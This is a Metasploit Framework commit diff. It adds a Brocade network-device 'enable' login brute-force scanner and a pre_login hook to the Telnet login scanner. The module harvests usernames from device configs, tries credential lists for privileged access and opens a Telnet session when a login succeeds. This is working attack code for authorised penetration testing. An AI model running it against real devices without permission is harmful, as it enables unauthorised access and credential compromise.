Land rapid7#5307, Brocade login scanner resurrection

wvu · wvu · commit 508574970c43 · 2015-05-07T22:43:39.000-05:00
diff --git a/lib/metasploit/framework/login_scanner/telnet.rb b/lib/metasploit/framework/login_scanner/telnet.rb
@@ -1,14 +1,15 @@
 require 'metasploit/framework/telnet/client'
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'
+
 module Metasploit
   module Framework
     module LoginScanner
-
       # This is the LoginScanner class for dealing with Telnet remote terminals.
       # It is responsible for taking a single target, and a list of credentials
       # and attempting them. It then saves the results.
       class Telnet
+
         include Metasploit::Framework::LoginScanner::Base
         include Metasploit::Framework::LoginScanner::RexSocket
         include Metasploit::Framework::Telnet::Client
@@ -25,12 +26,19 @@ class Telnet
         #
         #   @return [Fixnum]
         attr_accessor :banner_timeout
+
         # @!attribute verbosity
         #   The timeout to wait for the response from a telnet command.
         #
         #   @return [Fixnum]
         attr_accessor :telnet_timeout
 
+        # @!attribute verbosity
+        #   Prepend code to call before checking for a user login
+        #
+        #   @return [Proc]
+        attr_accessor :pre_login
+
         validates :banner_timeout,
                   presence: true,
                   numericality: {
@@ -66,6 +74,10 @@ def attempt_login(credential)
             end
 
             unless result_options[:status]
+              if pre_login
+                pre_login.call(self)
+              end
+
               unless password_prompt?
                 send_user(credential.public)
               end
@@ -108,13 +120,19 @@ def set_sane_defaults
           self.port               ||= DEFAULT_PORT
           self.banner_timeout     ||= 25
           self.telnet_timeout     ||= 10
+          self.pre_login          ||= nil
           self.connection_timeout ||= 30
           self.max_send_size      ||= 0
           self.send_delay         ||= 0
           # Shim to set up the ivars from the old Login mixin
           create_login_ivars
         end
 
+        def print_error(message)
+          return unless @parent
+          @parent.print_error(message)
+        end
+
       end
     end
   end
diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb
@@ -35,7 +35,7 @@ def create_login_ivars
     #
     # Some of these regexes borrowed from NeXpose, others added from datasets
     #
-    @login_regex = /(?:log[io]n( name|)|user(name|id|))\s*\:/i
+    @login_regex = /(?:log[io]n( name|)|user( ?name|id|))\s*\:/i
     @password_regex = /(?:password|passwd)\s*\:/i
     @false_failure_regex = /(?:(^\s*last)\ login *\:|allows only\ .*\ Telnet\ Client\ License)/i
     @failure_regex = /(?:
diff --git a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/telnet'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Telnet
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::CommandShell
+
+  def initialize
+    super(
+      'Name'        => 'Brocade Enable Login Check Scanner',
+      'Description' => %q{
+        This module will test a range of Brocade network devices for a
+        privileged logins and report successes. The device authentication mode
+        must be set as 'aaa authentication enable default local'.
+        Telnet authentication, e.g. 'enable telnet authentication', should not
+        be enabled in the device configuration.
+
+        This module has been tested against the following devices:
+              ICX6450-24 SWver 07.4.00bT311,
+              FastIron WS 624 SWver 07.2.02fT7e1
+      },
+      'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
+      'References'  =>
+        [
+          [ 'CVE', '1999-0502'] # Weak password
+        ],
+      'License'     => MSF_LICENSE
+    )
+    register_options(
+      [
+        OptBool.new('GET_USERNAMES_FROM_CONFIG', [ false, 'Pull usernames from config and running config', true])
+      ], self.class
+    )
+  @no_pass_prompt = []
+  end
+
+  def get_username_from_config(un_list,ip)
+    ["config", "running-config"].each do |command|
+      print_status(" Attempting username gathering from #{command} on #{ip}")
+      sock.puts("\r\n") # ensure that the buffer is clear
+      config = sock.recv(1024)
+      sock.puts("show #{command}\r\n")
+
+      # pull the entire config
+      while true do
+        sock.puts(" \r\n") # paging
+        config << sock.recv(1024)
+        # Read until we are back at a prompt and have received the 'end' of
+        # the config.
+        break if config.match(/>$/) and config.match(/end/)
+      end
+
+      config.each_line do |un|
+        if un.match(/^username/)
+          found_username = un.split(" ")[1].strip
+          un_list.push(found_username)
+          print_status("   Found: #{found_username}@#{ip}")
+        end
+      end
+    end
+  end
+
+  attr_accessor :no_pass_prompt
+  attr_accessor :password_only
+
+  def run_host(ip)
+    un_list = []
+    if datastore['GET_USERNAMES_FROM_CONFIG']
+        connect()
+        get_username_from_config(un_list,ip)
+        disconnect()
+    end
+
+    if datastore['USERNAME'] #put the provided username on the array to try
+        un_list.push(datastore['USERNAME'])
+    end
+
+    un_list.delete('logout') #logout, even when used as a un or pass will exit the terminal
+
+    un_list.each do |un|
+      cred_collection = Metasploit::Framework::CredentialCollection.new(
+          blank_passwords: datastore['BLANK_PASSWORDS'],
+          pass_file: datastore['PASS_FILE'],
+          password: datastore['PASSWORD'],
+          user_file: datastore['USER_FILE'],
+          userpass_file: datastore['USERPASS_FILE'],
+          username: un,
+          user_as_pass: datastore['USER_AS_PASS'],
+      )
+
+      cred_collection = prepend_db_passwords(cred_collection)
+
+      scanner = Metasploit::Framework::LoginScanner::Telnet.new(
+          host: ip,
+          port: rport,
+          proxies: datastore['PROXIES'],
+          cred_details: cred_collection,
+          stop_on_success: datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+          connection_timeout: datastore['Timeout'],
+          max_send_size: datastore['TCP::max_send_size'],
+          send_delay: datastore['TCP::send_delay'],
+          banner_timeout: datastore['TelnetBannerTimeout'],
+          telnet_timeout: datastore['TelnetTimeout'],
+          pre_login: lambda { |s| raw_send("enable\r\n", s.sock) },
+          framework: framework,
+          framework_module: self,
+      )
+
+      scanner.scan! do |result|
+        credential_data = result.to_h
+        credential_data.merge!(
+            module_fullname: self.fullname,
+            workspace_id: myworkspace_id
+        )
+
+        if result.success?
+          credential_core = create_credential(credential_data)
+          credential_data[:core] = credential_core
+          create_credential_login(credential_data)
+          print_good("#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}")
+          start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)
+        else
+          invalidate_login(credential_data)
+          print_error("#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})")
+        end
+      end
+    end
+  end
+
+  def start_telnet_session(host, port, user, pass, scanner)
+    print_status("Attempting to start session #{host}:#{port} with #{user}:#{pass}")
+    merge_me = {
+      'USERPASS_FILE' => nil,
+      'USER_FILE'     => nil,
+      'PASS_FILE'     => nil,
+      'USERNAME'      => user,
+      'PASSWORD'      => pass
+    }
+
+    start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true, scanner.sock)
+  end
+end

Original file line number	Diff line number	Diff line change
`@@ -35,7 +35,7 @@ def create_login_ivars`
`35`	`35`	`#`
`36`	`36`	`# Some of these regexes borrowed from NeXpose, others added from datasets`
`37`	`37`	`#`
`38`		`- @login_regex = /(?:log[io]n( name\|)\|user(name\|id\|))\s*\:/i`
	`38`	`+ @login_regex = /(?:log[io]n( name\|)\|user( ?name\|id\|))\s*\:/i`
`39`	`39`	`@password_regex = /(?:password\|passwd)\s*\:/i`
`40`	`40`	`@false_failure_regex = /(?:(^\slast)\ login \:\|allows only\ .*\ Telnet\ Client\ License)/i`
`41`	`41`	`@failure_regex = /(?:`